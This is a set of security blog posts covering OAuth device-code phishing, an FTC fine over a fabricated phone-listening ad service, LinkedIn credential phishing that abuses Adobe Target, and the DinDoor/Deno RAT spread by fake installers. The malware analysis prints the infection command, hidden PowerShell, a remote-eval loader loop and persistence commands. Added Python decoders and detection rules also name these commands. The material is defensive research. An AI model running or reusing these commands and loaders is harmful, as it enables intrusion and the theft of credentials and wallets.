Once the victim approves the request, the attacker’s device receives OAuth access and refresh tokens tied to the victim’s Microsoft 365 account. These tokens are what Microsoft uses to “remember” that you have already logged in, and they can be reused to access Outlook, OneDrive, Teams, and other Microsoft services without entering a password again.

With valid refresh tokens, attackers can maintain long‑term access until the tokens are revoked or expire, often blending in with normal account activity.

That access can allow cybercriminals to:

  • Read Outlook emails, including password reset messages
  • Access files stored in OneDrive or SharePoint
  • Send phishing emails to coworkers, customers, friends, or family from the victim’s account

How to protect yourself

Once in Outlook, attackers can not only read your messages but also send convincing new ones from your address, using your identity to compromise additional accounts and contacts.

Some tips to steer clear of this one:

  • Never enter a code at a Microsoft login page just because an email or message tells you to. You should only do this when you initiated the sign‑in yourself on your own device.
  • Slow down and read the prompts. Rushing through login approvals without reading them carefully can be costly.
  • Be suspicious of unexpected document shares, Teams invites, or login requests, even if they use legitimate Microsoft pages.
  • Review which devices are logged in under your account at https://account.microsoft.com/devices/. If you see unfamiliar devices or sign‑ins, remove them, change your Microsoft account password, and review your security settings.

Pro tip: Malwarebytes Scam Guard can help you figure out if a message is a scam.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

Company bragged phone mics could listen to conversations. They couldn’t.

Malware Bytes Security - Wed, 05/27/2026 - 5:56am

A media company and two of its marketing partners have been fined for selling a service which, they said, listened in to people’s conversations through their phones. In fact, they did nothing of the sort.

Most people have worried at some point that their phone has been listening to them through the microphone. You know how it goes: One minute you’re speaking to your friend about how you’ve always wanted to go to Fiji, the next minute you’re seeing social media ads for vacations there. However, as yet there hasn’t been much real proof that this is actually happening.

But that didn’t stop Cox Media Group from claiming it could listen in. Between 2023 and 2024, the company publicly promoted a service called “Active Listening” or “Voice Data,” claiming it used AI-powered voice-processing technology to capture conversations from smartphones, along with smart TVs and other devices with embedded microphones. 

The company told potential advertising clients that the system provided a tool to target, retarget, and retain customers.

The scandal came to light when 404 Media published internal pitch decks from Cox that detailed the supposed “Active Listening” capabilities. After the revelations, Cox initially backpedaled and denied listening to conversations, but the marketing materials contradicted these denials. 

The FTC found that the “Active Listening” service was completely fabricated. The service did not listen to consumers’ conversations or use voice data at all, nor did it accurately place ads in customers’ desired geographic locations. Instead, Cox and its partners simply resold email lists obtained from other data brokers at a significant markup.

Worst of all, the companies also falsely claimed that consumers had opted into voice data collection when they had not.

The Federal Trade Commission (FTC) fined the companies a total of $930,000 for falsely claiming they could spy on consumers. Cox Media Group must pay $880,000, while MindSift and 1010 Digital Works will each pay $25,000. The settlement funds will be used to provide refunds to Cox Media Group customers who were deceived by these false claims.

How to safekeep your personal data

In this case, the data that was being sold came from data brokers. Keeping your personal data away from them requires a combination of preventive measures and active removal efforts.

  • Minimize what you share on social media and elsewhere online. Data brokers use scraping tools to gather information from forum posts and public profiles, so avoid sharing sensitive details like your birth date, home address, phone number, and financial information.
  • Before signing up for online services, loyalty programs, or apps, carefully read privacy policies to understand how companies will collect, use, and share your data.
  • For active data removal, your options depend largely on where you live. It’s often best to leave that work to a specialized service you can trust.
  • Disable advertising IDs on your smartphones, tablets, and computers through your device settings where possible.
  • Use a VPN to hide your IP address and encrypt your browsing traffic, install ad and tracking blockers, and consider using more privacy-focused browsers.
Still wondering if your phone is listening to you?

We looked into this very topic on our Lock and Code podcast. Listen to it below, or search for it on your favorite podcast player.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.


Fake LinkedIn emails abuse Adobe to track victims

Malware Bytes Security - Wed, 05/27/2026 - 5:32am

Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.

The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:

  • The sender name, email address, and email signature don’t match
  • The sender company exists, but not in the US
  • The sender name exists, but not at that company
  • The attachment has a double file extension: pdf.html

“I would like to do business with you via LinkedIn. I’m a buyer.

Please find attached the signed contract No. #33110:12000pcs.

I look forward to hearing from you.”

Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is highly obfuscated. Basically, it’s a single line of JavaScript.

The script uses two common obfuscation methods: URL encoding and Base64. The script is divided into two Base64-encoded sections.

When you open the attachment, you’ll find a simple login form.

The target’s email address is hardcoded, and you’re unable to change or remove it. Possibly because some researchers have no qualms about flooding the receiving channel with false credentials.

But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. But the campaign isn’t using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect point in the phishing flow, most likely to track victims who fell for the phishing email.

In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.

After deobfuscating the scripts, we found the destination for the submitted credentials:

All in all, even with the level of obfuscation, the method is very raw and simple:

POST to: http://a1263367.xsph.ru/taam/Ln.php

With data:

  • AA = hardcoded email address
  • BB = whatever password the user entered

The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.
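To show the analysis described above in working form, here is an added Python decoder that is not the campaign's code or Malwarebytes' tooling: it peels the percent-encoding and Base64 layers off an HTML attachment's `atob()` literals and reports the form's post target and any pre-filled fields (the hardcoded address). The sample attachment at the bottom is constructed, with placeholder hostnames.

```python
"""Peel the URL-encoding/Base64 layers off an HTML credential-phishing attachment
and report where its form posts and which fields come pre-filled. Added analysis
example, not the campaign's code; the sample attachment at the bottom is constructed."""
import base64
import binascii
import re
from urllib.parse import quote, unquote

ATOB_RE = re.compile(r'atob\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
FIELD_RE = re.compile(r'<input[^>]*name="([^"]+)"[^>]*value="([^"]*)"', re.I)


def decode_layer(b64: str) -> str:
    """One layer: Base64 -> bytes -> text -> percent-decoding (JS unescape())."""
    raw = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    return unquote(raw)


def peel(html: str, max_depth: int = 8) -> str:
    """Replace every atob("...") literal with its decoded content, repeating
    while the result still contains Base64 literals (bounded to avoid loops)."""
    text = html
    for _ in range(max_depth):
        found = ATOB_RE.findall(text)
        if not found:
            break
        parts = []
        for b64 in found:
            try:
                parts.append(decode_layer(b64))
            except (binascii.Error, ValueError):
                parts.append("")          # malformed literal: skip it, keep going
        text = "\n".join(parts)
    return text


def extract_indicators(script: str) -> dict:
    """URLs the decoded script references and inputs that arrive pre-filled
    (a hardcoded victim address is a hallmark of targeted credential phishing)."""
    urls = sorted(set(URL_RE.findall(script)))
    prefilled = {name: value for name, value in FIELD_RE.findall(script) if value}
    return {"urls": urls, "prefilled": prefilled}


def analyze_attachment(html: str) -> dict:
    return extract_indicators(peel(html))


# Constructed sample, wrapped the way the post describes: percent-encoded JS inside
# two Base64 sections. Hostnames and the address are placeholders.
_PART1 = ('var f=document.createElement("form");f.method="POST";'
          'f.action="http://collector.example.invalid/taam/Ln.php";')
_PART2 = ('f.innerHTML=\'<input name="AA" value="victim@example.invalid">'
          '<input name="BB" type="password" value="">\';document.body.append(f);')


def _wrap(js: str) -> str:
    return base64.b64encode(quote(js, safe="").encode()).decode()


SAMPLE_HTML = ('<html><body><script>eval(unescape(atob("%s"))+unescape(atob("%s")))'
               '</script></body></html>' % (_wrap(_PART1), _wrap(_PART2)))

if __name__ == "__main__":
    print(analyze_attachment(SAMPLE_HTML))
```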

How to stay safe

The good news: Once you know what to look for, these attacks are much easier to spot and block. The bad news: They’re cheap, scalable, and likely to keep circulating.

So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

  • Only access your accounts through official apps or by typing the official website directly into your browser.
  • Check file extensions carefully. Even if a file looks like a PDF, it may not be.
  • Enable multi-factor authentication for your critical accounts.
  • Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.


Fake software on GitHub and SourceForge distributes Deno RAT

Malware Bytes Security - Tue, 05/26/2026 - 9:07am

During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms. 

DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.  

Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.  

These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT that can run additional payloads and exfiltrate data from browsers, wallets, and other applications, and that has an interesting peer-to-peer feature using Edge to hide malicious traffic.

Legitimate platforms abused to spread malware

In most of the analyzed cases, the infection chain starts with MSI files or PowerShell scripts downloaded from GitHub or SourceForge. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views.

Compromised YouTube channels with AI-generated videos 

The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. 

YouTube posts linking to the malicious GitHub repositories

The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. 

GitHub repository for fake ChatGPT installer 

The malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. 

Fake plugin that asks the user to copy and execute the malicious command 

Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. 

GitHub account with different malicious repositories

We found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. 

The malicious MSI files hosted on SourceForge

How to stay safe

The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.

Here are a few simple ways to stay safe:

  • Only download software from official vendor websites.
  • Be skeptical of “free”, cracked, or unofficial versions of paid software.
  • Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts.
  • Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything.
  • Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.
  • Check the file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file and selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag.
Technical analysis 

The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. 

Example of a malicious command hosted on GitHub that starts the infection chain: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.

The “Ps1File” and “CmdFile” inside the MSI dropper

The CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: 

@set "SCRIPTDIR=%~dp0"
@powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden"

The executed PowerShell script

The PowerShell script takes care of: 

  • Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows.
  • Using Scoop to install WinGet (Windows Package Manager) if missing.
  • Installing Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.

The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. 

Command executed to install Deno using WinGet: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent

The DinDoor Backdoor

Next, the following stage is executed with the downloaded Deno executable: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

The returned code (the internal name is “launcher-1”) is a small eval-loop function that downloads the next stage (the internal name is “launcher-2”). The downloaded backdoor is publicly known as DinDoor.

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2.  The HTTP endpoints used for C2 communications vary between the analyzed cases.  

The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.   

The obtained stage is executed via stdin without being written to disk, using the command: 

deno run -A --no-check -

To achieve persistence, the backdoor runs a PowerShell command to create a Run key that executes the downloader “launcher-1” used previously:

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js"

This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. 

Deno RAT 

The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.  

We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. 

In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true. 

The main function of the Deno RAT

The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality: 

  • Collect system information about the compromised device 
  • Full bidirectional control through a custom VNC implementation over WebSocket 
  • Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
  • Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo
  • Exfiltrate Telegram, Discord, and Lightcord data 
  • Record and modify clipboard data  
  • List folders and files, and exfiltrate the content of files with specific extensions
  • Capture screenshots using different methods  
  • Execute additional payloads  
  • Launch or terminate arbitrary processes  
  • Execute commands with PowerShell  
  • Establish SOCKS5 proxy tunnels over WebSocket 

One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.

To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. 

The injected HTML page inside Edge browser 

The RAT uses the following endpoints for C2 communication, which can vary between samples: 

  • /health: checks the “ok” response from the C2 
  • /token: receives config parameters, task delivery, results, and exfiltrated data
  • /vnc/agent/: WebSocket path used for VNC communication 

The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: 

{
    "buildId": "cd361ef3159f5ce9",
    "buildNote": "BWR",
    "buildType": "msi-v2",
    "proxyUrls": ["{C2}"],
    "userId": "…",
    "accessTokenHash": "…",
    "iat": 1779372546,
    "exp": 2094948546
}
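As an added defensive example (not the researchers' tooling), the following Python hunting heuristics cover the commands quoted in the technical analysis (curl/msiexec from raw GitHub, hidden PowerShell, the silent WinGet install of Deno, `deno run -A` against a remote URL or stdin, and the `conhost.exe --headless` Run key) and decode the Base64 config token shown above. The sample command lines and the token are constructed, with placeholder hosts and build IDs.

```python
"""Hunting heuristics for the Deno-based chain described above, run over
constructed command lines modelled on the commands quoted in the post, plus a
decoder for the RAT's Base64 config token. Added example, not the researchers'
own tooling; hostnames and values in the samples are placeholders."""
import base64
import json
import re

# (rule name, pattern): each keyed to one stage of the chain
RULES = [
    ("msi-from-github-raw",
     re.compile(r'curl\s.*raw\.githubusercontent\.com/.*\.msi.*msiexec\s+/i', re.I)),
    ("hidden-powershell",
     re.compile(r'powershell(?:\.exe)?\s.*-ExecutionPolicy\s+Bypass.*-WindowStyle\s+Hidden', re.I)),
    ("winget-silent-deno",
     re.compile(r'winget(?:\.exe)?"?\s+install\s+--id\s+DenoLand\.Deno\b.*--silent', re.I)),
    ("deno-remote-script",
     re.compile(r'deno(?:\.exe)?"?\s+run\s+(?:-A|--allow-all)\b.*https?://', re.I)),
    ("deno-stdin-script",
     re.compile(r'deno(?:\.exe)?"?\s+run\s.*--no-check\s+-\s*$', re.I)),
    ("conhost-headless-deno",
     re.compile(r'conhost\.exe\s+--headless\s+"[^"]*deno\.exe"', re.I)),
]


def classify_cmdline(cmd: str) -> list:
    """Names of every rule the command line trips (empty list = nothing seen)."""
    return [name for name, rx in RULES if rx.search(cmd)]


RAT_CONFIG_KEYS = {"buildId", "buildType", "proxyUrls"}


def decode_agent_config(auth_header: str):
    """The RAT presents its Base64 config as the authorization token. Return
    the decoded JSON when it carries the RAT's config keys, otherwise None."""
    token = auth_header.split()[-1]
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        data = json.loads(raw)
    except ValueError:           # bad Base64 (binascii.Error) or not JSON
        return None
    return data if isinstance(data, dict) and RAT_CONFIG_KEYS.issubset(data) else None


# Constructed samples modelled on the post's quoted commands (placeholders, not live IoCs).
SAMPLE_CMDLINES = [
    r"curl -Lo %temp%\s.msi https://raw.githubusercontent.com/placeholder/install/main/install.msi && msiexec /i %temp%\s.msi",
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\admin\AppData\Local\Temp\x\a.ps1"',
    r'"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent',
    r'"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\placeholder\deno.exe" run -A http://c2.example.invalid/abc.js',
    r"deno run -A --no-check -",
    r'conhost.exe --headless "C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\placeholder\deno.exe" -A "%APPDATA%\0123abcd.js"',
    r"deno run --allow-net main.ts",          # benign developer use: must not trip
]
SAMPLE_TOKEN = base64.b64encode(json.dumps({
    "buildId": "0000000000000000", "buildNote": "sample", "buildType": "msi-v2",
    "proxyUrls": ["http://c2.example.invalid"], "iat": 0, "exp": 1}).encode()).decode()


def scan(cmdlines) -> dict:
    """Map each command line that tripped a rule to the rule names."""
    return {c: hits for c in cmdlines if (hits := classify_cmdline(c))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(hits, "<-", cmd[:70])
    print(decode_agent_config("Bearer " + SAMPLE_TOKEN))
```

The patterns are deliberately narrow (permission flag plus a remote or stdin source, or the package-manager install run silently) so ordinary Deno development on a workstation does not trip them; tune the benign sample against your own fleet before alerting on them.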

We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication. 

The “light” version of the RAT

 

Acknowledgements

Indicators of Compromise (IOCs)

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
